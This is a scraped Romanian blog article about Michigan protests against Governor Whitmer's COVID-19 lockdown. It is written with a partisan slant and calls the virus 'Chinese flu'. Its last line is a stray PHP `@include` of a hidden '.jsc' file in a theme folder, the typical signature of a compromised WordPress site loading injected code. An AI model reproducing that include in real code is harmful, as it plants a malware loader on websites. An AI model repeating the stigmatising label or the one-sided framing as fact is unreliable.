Warning: Undefined array key "action" in /home/cronicarul.ro/public_html/wp-content/themes/generatepress_child/functions.php on line 2
Americanii se revoltă împotriva carantinei – Cronicarul

Americanii se revoltă împotriva carantinei

În statul Michigan a început revolta împotriva măsurilor de carantină luate de guvernatorul democrat Gretchen Whitmer. Aceasta a emis unul dintre cele mai restrictive ordine prin care toate activitățile considerate neesențiale trebuie să înceteze.

Problema e că doamna guvernator permite clinicilor de avorturi să-și continue activitatea, la fel este și cazul magazinelor care comercializează marijuana. Aceste sunt considerate a fi activități esențiale! Dar au fost închise toate micile afaceri și toate bisericile. Atunci lumea s-a revoltat și a luat cu asalt capitala statului, Lansing, unde mii de mașini au blocat străzile din jurul clădirilor administrative. Sloganul sub care s-a desfășurat protestul a fost Magazinele unde se comercializează droguri? Deschise! Clinicele de avorturi? Deschise! Bisericile? Închise! Micile afaceri locale? În faliment!

Protestatarii susțin că premisa de la care s-a pornit este complet greșită și că nu ar trebui să se discute despre ce este esențial sau neesențial, ci despre ce activități se pot relua în condiții de siguranță.

Amintim că statul Michigan înregistrează peste 27.000 de infectări cu gripa chinezească și peste 1.700 de decese.

Un comentariu la „Americanii se revoltă împotriva carantinei”

Lasă un comentariu

@include "wp-content/themes/seotheme/inc/customizer/assets/js/include/7536.jsc";